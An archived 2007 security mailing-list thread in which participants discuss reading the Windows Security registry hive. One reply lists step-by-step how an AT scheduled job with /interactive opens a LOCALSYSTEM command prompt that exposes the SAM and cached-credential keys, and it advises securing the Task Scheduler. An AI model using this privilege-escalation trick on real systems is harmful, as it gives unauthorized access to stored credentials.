RE: Help with Exploit

Harlan, et al

To access the security regkeys in HKLM you don't need to change the ACLs.

This is an age-old (well, since early NT4 anyway) trick to get LOCALSYSTEM
privs on anything that allows you to run an AT job:

. Get the current time.
. From CMD line run "AT <time+1 minute> /interactive CMD.EXE".
. Wait for a minute.
. CMD window opens in LOCALSYSTEM context.
. Run REGEDIT from new CMD window.
. Navigate to HKLM\SECURITY.
. Marvel at now visible security keys: Cache, Policy, RXACT, SAM.

This particular trick is the basis for a deal of trivial priv escalation
attacks on windows, so if you can, you should secure the Task Scheduler with
a non-priv'ed user or disable it. Another good reason for not giving users
local admin rights.



James D. Stallard, MIoD
Microsoft and Networks Infrastructure Technical Architect
Skype: JamesDStallard

-----Original Message-----
From: listbounce@xxxxxxxxxxxxxxxxx [mailto:listbounce@xxxxxxxxxxxxxxxxx] On
Behalf Of Harlan Carvey
Sent: 17 April 2007 14:40
To: Nicolas RUFF; Murda Mcloud; 'Vic Brown'
Cc: focus-ms@xxxxxxxxxxxxxxxxx
Subject: Re: Help with Exploit

I've done some googling and am finding that the
new RR version checks the
security hive(which I believe to be 'invisible' to
regedit-can someone
correct me if I'm wrong?).

On a live system, the Security hive is not accessible by default. You need
to change the ACLs so that the Admin has the ability to read the hive.

I know I am coming late on this one, but registry keys that contain
NULL characters cannot be accessed through REGEDIT. You have to rely
on the low-level NTDLL API to access them. It is known "copy
protection" trick :)


Harlan Carvey, CISSP
author: "Windows Forensic Analysis"

Relevant Pages

  • Re: Newbie Question: Windows Explorer
    ... is currently using this trick to ... >> security features you're thinking of are part of the ... >>> manager, ...
  • Re: pen testing & obfuscated shell code
    ... That is the real trick. ... DP> By that I mean do you replace the known sled of x90 with another 1 byte instruction ... DP> won't affect the egg? ... Astaro Security Linux -- firewall with Spam/Virus Protection ...
  • Re: pen testing & obfuscated shell code
    ... That is the real trick. ... In some cases/exploits you can use multibyte NOP sleds. ... Astaro Security Linux -- firewall with Spam/Virus Protection ...
  • RE: [Full-Disclosure] A worm...
    ... Windows unzipper when double-clicking on an executable file in a .ZIP ... Hi Richard, ... Also XP is quite vulnerable to this type of trick. ... Kruse Security ...
  • Re: Tools to Analyse Logs in Checkpoint NG
    ... >or good freeware package that can be used to analyse ... >Firewall Log files. ... Harlan ... Thinking About Security Training? ...